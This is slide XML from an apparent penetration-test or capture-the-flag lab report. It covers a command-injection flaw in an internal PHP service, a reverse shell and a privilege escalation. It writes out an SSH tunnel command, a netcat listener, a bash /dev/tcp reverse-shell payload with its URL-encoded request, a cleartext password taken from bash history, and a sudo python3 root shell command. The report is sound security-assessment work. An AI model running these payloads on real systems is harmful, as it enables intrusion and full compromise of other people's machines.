          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCFD297C-C531-82F2-80B0-1AFAC78C8998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6878320" y="3040380"/>
            <a:ext cx="5079157" cy="3032761"/>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68591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1B93B-44E6-930E-F582-FE605FC2D9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3F661-DC89-5697-F9A7-AFEA909CFB72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="314960"/>
            <a:ext cx="6580367" cy="6400799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" b="1" dirty="0"/>
              <a:t>Exposed Internal Web Service on Port 9999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Vulnerability Description : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>An internal web service was discovered running on localhost:9999. This service was not exposed externally, but we accessed it by creating an SSH tunnel after logging in with reused credentials. The service was vulnerable to remote command execution (RCE) via a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> parameter in the index. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> file, leading to a reverse shell and complete compromise of the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0"/>
              <a:t>Severity: High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" i="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0"/>
              <a:t>CVSS Score: 8.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0"/>
              <a:t>CVSS Vector String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2200" b="1" dirty="0"/>
              <a:t>(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" i="1" dirty="0"/>
              <a:t>We started looking at the web-related files: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" i="1" dirty="0"/>
              <a:t>cat /opt/web/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" b="1" i="1" dirty="0"/>
              <a:t>We came across a code in the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" b="1" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" b="1" i="1" dirty="0"/>
              <a:t>’ file that would allow us to do remote command execution on the web page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" b="1" i="1" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2600" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" b="1" dirty="0"/>
              <a:t>Remote Code Execution via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" b="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3800" b="1" dirty="0"/>
              <a:t> Parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The web application hosted on an internal service (localhost:9999) contains an insecure implementation in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>, which accepts a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> parameter without input sanitization. This enables to execute arbitrary system commands remotely, including reverse shells, by accessing the parameter through SSH port forwarding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0"/>
              <a:t>Severity: Critical  CVSS Score: 9.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2200" b="1" dirty="0"/>
              <a:t>CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2900" b="1" i="1" dirty="0"/>
              <a:t>We created a ssh tunnel between our local machine and the remote server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2500" b="1" i="1" dirty="0"/>
              <a:t>command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2500" i="1" dirty="0"/>
              <a:t>ssh -L 9999:127.0.0.1:9999 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2500" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>jehad@192.168.139.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2500" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12511A1C-2E16-54BE-735F-3B39D5202E5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7814468" y="314960"/>
            <a:ext cx="3438843" cy="1828800"/>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9A9A90CD-2069-97B5-26EE-740BB2268B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7282180" y="2467610"/>
            <a:ext cx="4503420" cy="3611879"/>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76384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3AA0F-BAB6-4C49-3535-639C33EFAB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D8FD-41BA-9857-9D06-F65FEE4BE8DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="294641"/>
            <a:ext cx="7210287" cy="5877560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Visiting the forwarded port on our local system: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Knowing that the site accepted GET requests from the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>’ code, we continued interacting with the current target system by adding a ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>=id’ parameter to the end of the URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" dirty="0"/>
              <a:t>Reverse Shell Execution via RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>The internal web service running on port 9999 includes an RCE vulnerability via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> parameter in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>. By exploiting this flaw, We were able to inject a reverse shell payload, enabling a persistent remote connection to the target system from the attacker’s machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>Severity: Critical  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" b="1" dirty="0"/>
              <a:t>CVSS Score:  9.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1900" b="1" dirty="0"/>
              <a:t>CVSS String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1900" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>To get a reverse shell as this user so started listening on port 9001 on our local system:                                                                                                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> 9001  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>We used the following payload for the reverse shell:                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>bash -c 'bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>/192.168.139.139/9001 0&gt;&amp;1’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>URL Encoded version: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://127.0.0.1:9999/index.php?cmd=bash%20-c%20%27bash%20i%20%3E%26%20/dev/tcp/192.168.139.139/9001%200%3E%261%27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92DD4B5A-247A-6D77-F949-0461DB52C347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="28636"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7727177" y="294641"/>
            <a:ext cx="4156710" cy="1451609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B8C60D3-682F-5C2E-0432-7E029765BF96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect r="16209"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7700190" y="2555240"/>
            <a:ext cx="4183697" cy="2931160"/>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02717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52682-E7E2-728D-28EB-7C6D79B9F9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D4156-3501-B635-2A6B-84470CA6BD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254000" y="325120"/>
            <a:ext cx="6776720" cy="5750560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" u="sng" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>We checked bash history has a password of the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>losy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> :  cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t>Which showed us password in clear test : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>gang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Privilege Escalation via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> python3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>As tester we leveraged the ability to run python3 with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> privileges to escalate access from a limited user to root. By executing a Python command that spawns a bash shell, full administrative control over the system was achieved, bypassing proper privilege boundaries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Severity: High  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS Score: 7.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Command:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t>script -qc "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t> python3 -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t>(\"/bin/bash\")'" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB63A4AB-E22A-1142-7A9C-420F5644913B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7030720" y="3429000"/>
            <a:ext cx="4907280" cy="2646680"/>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0C63CFE4-4493-4978-AD62-F10644A22887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7030720" y="325120"/>
            <a:ext cx="4907280" cy="2646680"/>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7184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E7C1-1C50-D96E-1446-C07F5CABB17E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061696" y="295788"/>
            <a:ext cx="10058400" cy="688186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BCE3B9-E74E-4D9A-7B3C-10BAD8A45335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536713" y="983975"/>
            <a:ext cx="11380303" cy="5277678"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Abstract</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Vulnerability Summery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Graph</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Mapping against OWASP top 10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Deliverables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tools and Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Risk / Impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154203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34958-FC0B-4FE5-6BD6-28EB47C737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8B440-202A-6283-C83A-883B50BB24DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="304801"/>
            <a:ext cx="11638722" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" u="sng" dirty="0"/>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Flag Disclosure due to Weak File Permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
